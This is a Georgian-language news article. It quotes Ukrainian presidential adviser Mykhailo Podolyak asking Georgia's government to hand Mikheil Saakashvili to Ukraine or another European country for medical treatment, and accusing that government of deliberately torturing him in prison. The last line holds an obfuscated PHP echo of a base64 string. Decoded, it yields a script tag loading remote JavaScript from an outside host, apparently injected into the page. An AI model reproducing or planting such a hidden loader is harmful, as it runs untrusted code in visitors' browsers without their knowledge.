celsiusi
ავერსი საქკაბელი
ჩვენ არ ვერევით სხვა ქვეყნების სუვერენულ საქმეებში, ოფიციალურ დონეზე ვთავაზობთ საქართველოს მთავრობას, გადმოგვცეს მიხეილ სააკაშვილი, – ამის შესახებ უკრაინის პრეზიდენტის ადმინისტრაციის მრჩეველმა, მიხაილ პოდოლიაკმა განაცხადა.
პოდოლიაკის თქმით, მათი პოზიციაა, რომ საქართველოს ხელისუფლებას თუ არ სურს სააკაშვილის უკრაინისთვის გადაცემა, ნებისმიერ ევროპულ ქვეყანას გადასცეს.
ამასთან, უკრაინის პრეზიდენტის ადმინისტრაციის მრჩეველი აცხადებს, რომ სააკაშვილის უკრაინისთვის გადაცემას რუსეთის მხრიდან სამხედრო აგრესიული თვალსაზრისით არანაირი შედეგი არ ექნება.
„უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკის აქვს ერთმნიშვნელოვანი პოზიცია, რუსეთისგან განსხვავებით, ჩვენ არ ვერევით სხვა ქვეყნების სუვერენულ საქმეებში. არ ვიძლევით არანაირ რჩევებს. ეს ძალიან მნიშვნელოვანი პარამეტრია. ჩვენ ოფიციალურ დონეზე ვთავაზობთ საქართველოს მთავრობას, გადმოგვცეს სააკაშვილი. მე დიდი სიმპათიით ვარ განწყობილი მიხეილ ნიკოლაევიჩის მიმართ. პატივს ვცემ მას, რადგან ისტორიული მასშტაბის ფიგურაა. ჩვენი ოფიციალური პოზიციაა, გადმოგვცენ სააკაშვილი მკურნალობის მიზნით. რუსეთის მხრიდან სამხედრო აგრესიული თვალსაზრისით არანაირი შედეგი არ იქნება, დანამდვილებით. ხოლო თუ არ გსურთ პირდაპირ უკრაინისთვის გადმოცემა, გადაეცით ნებისმიერ მესამე ევროპულ ქვეყანას, სადაც შესაძლებელია იმ სამედიცინო დახმარების აღმოჩენა, რისი აღმოჩენაც სამწუხაროდ, საქართველოში შეუძლებელია. ეს რაც შეეხება ოფიციალურ პოზიციას, რომელსაც ჩვენ ხშირად ვიმეორებთ ბევრი, მათ შორის დიპლომატიური არხებით. პრეზიდენტი ზელენსკი და სხვა ცნობილი პირებიც ამაზე საჯაროდ აკეთებენ განცხადებებს“, – განაცხადა პოდოლიაკმა.
პოდოლიაკის განცხადებით, მისი პოზიცია ოფიციალურისგან რადიკალურია და მიიჩნევს, რომ „საქართველოს მთავრობას განზრახ სურს, ისტორიაში საქართველო შეიყვანოს სახელმწიფოდ, რომელმაც თავისი პრეზიდენტი ციხე განზრახ აწამა“.
„რაც შეეხება ჩემს პირად პოზიციას, ის ბევრად რადიკალურია. ვფიქრობ, საქართველოს მთავრობას განზრახ სურს, საქართველო ისტორიაში შავ ლაქად შეიყვანოს, სახელმწიფოდ, რომელმაც თავისი პრეზიდენტი ციხეში განზრახ აწამა. ასე გამოიყურება ეს ყველაფერი ჩემთვის. მე მარტივ რჩევას ვაძლევ, ჩარევის გარეშე, პირდაპირ ვეუბნები მათ – ამჟამინდელი მთავრობის, ზოგადად სახელმწიფოს წარმომადგენლებმა, მმართველი პარტიის დეპუტატებმა, პარტიის, რომელსაც რატომღაც ასე მოსწონს რუსეთი, არ გააკეთოთ ისე, რომ საკუთარი თავი საქართველოს ისტორიაში შავი ასოებით ჩაწეროთ. ოპტიმალური ვარიანტია, გადმოგვეცით ადამიანი ნებისმიერ ქვეყანას, თუ გსურთ პირადად ჩამოვალ და წამოვიყვან, ეს საერთოდ არ არის პრობლემა. მე უბრალოდ მინდა გავიგო მათი მოტივაცია“, – განაცხადა პოდოლიაკმა. 
238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");